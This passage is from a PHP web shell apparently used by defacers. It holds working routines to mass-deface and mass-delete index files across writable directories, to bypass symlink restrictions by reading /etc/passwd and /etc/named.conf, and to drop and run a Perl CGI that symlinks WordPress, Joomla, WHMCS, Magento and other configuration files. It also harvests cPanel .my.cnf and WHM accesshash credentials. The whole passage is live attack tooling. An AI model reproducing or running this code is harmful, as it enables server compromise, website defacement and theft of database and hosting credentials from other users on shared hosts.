  633.    echo ' Sha256 <br> <input class=inputz type=text size=50 value=' . $sha256 . '> <br><br>';
  634.    echo ' Sha384 <br> <input class=inputz type=text size=50 value=' . $sha384 . '> <br><br>';
  635.    echo ' Sha512 <br> <input class=inputz type=text size=50 value=' . $sha512 . '> <br><br>';
  636.    echo ' Sha1 with Salt <br> <input class=inputz type=text size=50 value=' . $hash1_sha1 . '> <br><br>';
  637.    echo ' Sha1 with Salt & MD5 <br> <input class=inputz type=text size=50 value=' . $hash1_sha1_double . '> </font><br><br></center>';
  638.  
  639. }
  640.  
  641. elseif($_GET['do'] == 'kill') {
  642.     if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
  643.             die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  644.         else
  645.             echo '<center>unlink failed!</center>';
  646.  
  647. }
  648. elseif($_GET['do'] == 'reverseip') {
  649.     function s57_curl($domen){
  650.     $c = curl_init();
  651.     $curl = array(
  652.         CURLOPT_URL=>"http://viewdns.info/reverseip/?host=".$domen."&t=1",
  653.         CURLOPT_USERAGENT=>"User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
  654.         CURLOPT_RETURNTRANSFER=>1,
  655.         CURLOPT_SSL_VERIFYPEER=>0,
  656.         CURLOPT_HEADER=>0,
  657.         CURLOPT_FOLLOWLOCATION=>1);
  658.     curl_setopt_array($c,$curl);
  659.     $e = curl_exec($c);
  660.     curl_close($c);
  661.     return $e;
  662. }
  663. function s57_p($pemisah,$string){
  664.     return explode(chr(1),str_replace($pemisah,chr(1),$string));
  665. }
  666.  
  667. echo "<form method='post'>
  668.     <center><input class='text' type='text' name='domain' placeholder='IP/Domain' style='width: 250px; height: 33px;'><input class='submit' type='submit' name='sbmt' style='color: lime; width: 30px; height: 33px;' value='>>'>
  669.     <br><span style='font-size: 17px;'> Masukin site tanpa http atau https </span></form>";
  670.  
  671.     if(isset($_POST['sbmt'])){
  672. echo "Result for : " .$_POST['domain'];
  673. $r = s57_p(array('<table border="1">','<table width="1000" border="0">'),s57_curl($_POST['domain']));
  674. echo "<table border=1>";
  675. echo $r[1];
  676. echo "</table></center>";
  677. }
  678. }
  679. elseif($_GET['do'] == 'mass_deface') {
  680.     function sabun_massal($dir,$namafile,$isi_script) {
  681.         if(is_writable($dir)) {
  682.             $dira = scandir($dir);
  683.             foreach($dira as $dirb) {
  684.                 $dirc = "$dir/$dirb";
  685.                 $lokasi = $dirc.'/'.$namafile;
  686.                 if($dirb === '.') {
  687.                     file_put_contents($lokasi, $isi_script);
  688.                 } elseif($dirb === '..') {
  689.                     file_put_contents($lokasi, $isi_script);
  690.                 } else {
  691.                     if(is_dir($dirc)) {
  692.                         if(is_writable($dirc)) {
  693.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  694.                             file_put_contents($lokasi, $isi_script);
  695.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  696.                         }
  697.                     }
  698.                 }
  699.             }
  700.         }
  701.     }
  702.     function sabun_biasa($dir,$namafile,$isi_script) {
  703.         if(is_writable($dir)) {
  704.             $dira = scandir($dir);
  705.             foreach($dira as $dirb) {
  706.                 $dirc = "$dir/$dirb";
  707.                 $lokasi = $dirc.'/'.$namafile;
  708.                 if($dirb === '.') {
  709.                     file_put_contents($lokasi, $isi_script);
  710.                 } elseif($dirb === '..') {
  711.                     file_put_contents($lokasi, $isi_script);
  712.                 } else {
  713.                     if(is_dir($dirc)) {
  714.                         if(is_writable($dirc)) {
  715.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  716.                             file_put_contents($lokasi, $isi_script);
  717.                         }
  718.                     }
  719.                 }
  720.             }
  721.         }
  722.     }
  723.     if($_POST['start']) {
  724.         if($_POST['tipe_sabun'] == 'mahal') {
  725.             echo "<div style='margin: 5px auto; padding: 5px'>";
  726.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  727.             echo "</div>";
  728.         } elseif($_POST['tipe_sabun'] == 'murah') {
  729.             echo "<div style='margin: 5px auto; padding: 5px'>";
  730.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  731.             echo "</div>";
  732.         }
  733.     }
  734.  
  735. else {
  736.     echo "<center>";
  737.     echo "<form method='post'>
  738.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  739.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  740.     <font style='text-decoration: underline;'>Folder:</font><br>
  741.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  742.     <font style='text-decoration: underline;'>Filename:</font><br>
  743.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  744.     <font style='text-decoration: underline;'>Index File:</font><br>
  745.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by SAZFHI_!D</textarea><br>
  746.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  747.     </form></center>";
  748.     }
  749. } elseif($_GET['do'] == 'symlink') {
  750.  
  751.     echo "<center><br> <b><a  style='color: lime;' href='?dir=$dir&do=symlink2'>SYMLINK SERVER 2 </a> |  <a style='color: lime;'  href='?dir=$dir&do=sym404'> BYPASS SYMLINK 404 </b></font></a></center>";
  752.  
  753. } elseif($_GET['do'] == 'sym404') {
  754.  
  755.     echo "<center><form method='post'><br>File Target : <br><input type='text' name='dir' value='/home/user/public_html/wp-config.php'>
  756. <br>Save As: <br><input type='text' name='jnck' value='ojayakan.txt'><input name='ojaykan' type='submit' value='>>'></form><br></center>";
  757.  
  758. @ini_set('display_errors', 0);
  759. if($_POST['ojaykan']){
  760. rmdir("sazfhi_sym404");mkdir("sazfhi_sym404", 0777);
  761. $dir = $_POST['dir'];
  762. $jnck = $_POST['jnck'];
  763. system("ln -s ".$dir." sazfhi_sym404/".$jnck);
  764. symlink($dir,"sazfhi_sym404/".$jnck);
  765. $inija = fopen("sazfhi_sym404/.htaccess", "w");
  766. fwrite($inija,"ReadmeName ".$jnck."
  767. Options Indexes FollowSymLinks
  768. DirectoryIndex ngeue.htm
  769. AddType text/plain .php
  770. AddHandler text/plain .php
  771. Satisfy Any
  772. ");
  773. echo'<a href="sazfhi_sym404/">Klik Gan >:(</a>';
  774. }
  775.  
  776. } elseif($_GET['do'] == 'symlink2') {
  777. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  778. $d0mains = @file("/etc/named.conf");
  779. ##httaces
  780. if($d0mains){
  781. @mkdir("sazfhi_sym",0777);
  782. @chdir("sazfhi_sym");
  783. @exe("ln -s / root");
  784. $file3 = 'Options Indexes FollowSymLinks
  785. DirectoryIndex sazfhi.htm
  786. AddType text/plain .php
  787. AddHandler text/plain .php
  788. Satisfy Any';
  789. $fp3 = fopen('.htaccess','w');
  790. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  791. echo "
  792. <table align=center border=1 style='width:60%;border-color:#77f7f9;'>
  793. <tr>
  794. <td align=center><font size=2>S. No.</font></td>
  795. <td align=center><font size=2>Domains</font></td>
  796. <td align=center><font size=2>Users</font></td>
  797. <td align=center><font size=2>Symlink</font></td>
  798. </tr>";
  799. $dcount = 1;
  800. foreach($d0mains as $d0main){
  801. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  802. flush();
  803. if(strlen(trim($domains[1][0])) > 2){
  804. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  805. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  806. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  807. <td>".$user['name']."</td>
  808. <td><a href='$full/sazfhi_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  809. flush();
  810. $dcount++;}}}
  811. echo "</table>";
  812. }else{
  813. $TEST=@file('/etc/passwd');
  814. if ($TEST){
  815. @mkdir("sazfhi_sym",0777);
  816. @chdir("sazfhi_sym");
  817. exe("ln -s / root");
  818. $file3 = 'Options Indexes FollowSymLinks
  819. DirectoryIndex sazfhi.htm
  820. AddType text/plain .php
  821. AddHandler text/plain .php
  822. Satisfy Any';
  823.  $fp3 = fopen('.htaccess','w');
  824.  $fw3 = fwrite($fp3,$file3);
  825.  @fclose($fp3);
  826.  echo "
  827. <table align=center border=1><tr>
  828. <td align=center><font size=3>S. No.</font></td>
  829. <td align=center><font size=3>Users</font></td>
  830. <td align=center><font size=3>Symlink</font></td></tr>";
  831.  $dcount = 1;
  832.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  833.  while(!feof($file)){
  834.  $s = fgets($file);
  835.  $matches = array();
  836.  $t = preg_match('//(.*?)://s', $s, $matches);
  837.  $matches = str_replace("home/","",$matches[1]);
  838.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  839.  continue;
  840.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  841. <td align=center><font class=txt>" . $matches . "</td>";
  842.  echo "<td align=center><font class=txt><a href=$full/sazfhi_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  843.  $dcount++;}fclose($file);
  844.  echo "</table>";}else{if($os != "Windows"){@mkdir("sazfhi_sym",0777);@chdir("sazfhi_sym");@exe("ln -s / root");$file3 = '
  845. Options Indexes FollowSymLinks
  846. DirectoryIndex sazfhi.htm
  847. AddType text/plain .php
  848. AddHandler text/plain .php
  849. Satisfy Any
  850. ';
  851.  $fp3 = fopen('.htaccess','w');
  852.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  853.  echo "
  854. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  855. <table align=center border=1><tr>
  856. <td align=center><font size=3>ID</font></td>
  857. <td align=center><font size=3>Users</font></td>
  858. <td align=center><font size=3>Symlink</font></td></tr>";
  859.  $temp = "";$val1 = 0;$val2 = 1000;
  860.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  861.  if ($uid)$temp .= join(':',$uid)."n";}
  862.  echo '<br/>';$temp = trim($temp);$file5 =
  863.  fopen("test.txt","w");
  864.  fputs($file5,$temp);
  865.  fclose($file5);$dcount = 1;$file =
  866.  fopen("test.txt", "r") or exit("Unable to open file!");
  867.  while(!feof($file)){$s = fgets($file);$matches = array();
  868.  $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  869.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  870.  continue;
  871.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  872. <td align=center><font class=txt>" . $matches . "</td>";
  873.  echo "<td align=center><font class=txt><a href=$full/sazfhi_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  874.  $dcount++;}
  875.  fclose($file);
  876.  echo "</table></div></center>";unlink("test.txt");
  877.  } else
  878.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  879.  }
  880.  }
  881.  
  882.  
  883. }
  884. elseif($_GET['do'] == 'domain'){
  885.     echo "<center><div><p align='center'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table><tr bgcolor=#333><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  886.  
  887. }elseif($_GET['do'] == 'mass_delete') {
  888.     function hapus_massal($dir,$namafile) {
  889.         if(is_writable($dir)) {
  890.             $dira = scandir($dir);
  891.             foreach($dira as $dirb) {
  892.                 $dirc = "$dir/$dirb";
  893.                 $lokasi = $dirc.'/'.$namafile;
  894.                 if($dirb === '.') {
  895.                     if(file_exists("$dir/$namafile")) {
  896.                         unlink("$dir/$namafile");
  897.                     }
  898.                 } elseif($dirb === '..') {
  899.                     if(file_exists("".dirname($dir)."/$namafile")) {
  900.                         unlink("".dirname($dir)."/$namafile");
  901.                     }
  902.                 } else {
  903.                     if(is_dir($dirc)) {
  904.                         if(is_writable($dirc)) {
  905.                             if(file_exists($lokasi)) {
  906.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  907.                                 unlink($lokasi);
  908.                                 $idx = hapus_massal($dirc,$namafile);
  909.                             }
  910.                         }
  911.                     }
  912.                 }
  913.             }
  914.         }
  915.     }
  916.     if($_POST['start']) {
  917.         echo "<div style='margin: 5px auto; padding: 5px'>";
  918.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  919.         echo "</div>";
  920.     } else {
  921.     echo "<center>";
  922.     echo "<form method='post'>
  923.     <font style='text-decoration: underline;'>Folder:</font><br>
  924.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  925.     <font style='text-decoration: underline;'>Filename:</font><br>
  926.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  927.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  928.     </form></center>";
  929.     }
  930. } elseif($_GET['do'] == 'config') {
  931.     $idx = mkdir("sazfhi_config", 0777);
  932.     $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  933.     $htc = fopen("sazfhi_config/.htaccess","w");
  934.     fwrite($htc, $isi_htc);
  935.     fclose($htc);
  936.     if(preg_match("/vhosts|vhost/", $dir)) {
  937.         $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  938.         $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  939.         $file = "sazfhi_config/vhost.cin";
  940.         $handle = fopen($file ,"w+");
  941.         fwrite($handle ,base64_decode($vhost));
  942.         fclose($handle);
  943.         chmod($file, 0755);
  944.         if(exe("cd sazfhi_config && ./vhost.cin")) {
  945.             echo "<center><a href='$link_config/sazfhi_config'><font color=lime>Done</font></a></center>";
  946.         } else {
  947.             echo "<center><a href='$link_config/sazfhi_config/vhost.cin'><font color=lime>Done</font></a></center>";
  948.         }
  949.  
  950.     } else {
  951.         $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  952.         while($passwd = fgets($etc)) {
  953.             if($passwd == "" || !$etc) {
  954.                 echo "<font color=red>Can't read /etc/passwd</font>";
  955.             } else {
  956.                 preg_match_all('/(.*?):x:/', $passwd, $user_config);
  957.                 foreach($user_config[1] as $user_idx) {
  958.                     $user_config_dir = "/home/$user_idx/public_html/";
  959.                     if(is_readable($user_config_dir)) {
  960.                         $grab_config = array(
  961.                             "/home/$user_idx/.my.cnf" => "cpanel",
  962.                             "/home/$user_idx/.accesshash" => "WHM-accesshash",
  963.                             "$user_config_dir/po-content/config.php" => "Popoji",
  964.                             "$user_config_dir/vdo_config.php" => "Voodoo",
  965.                             "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  966.                             "$user_config_dir/config/koneksi.php" => "Lokomedia",
  967.                             "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  968.                             "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  969.                             "$user_config_dir/whm/configuration.php" => "WHMCS",
  970.                             "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  971.                             "$user_config_dir/forum/config.php" => "phpBB",
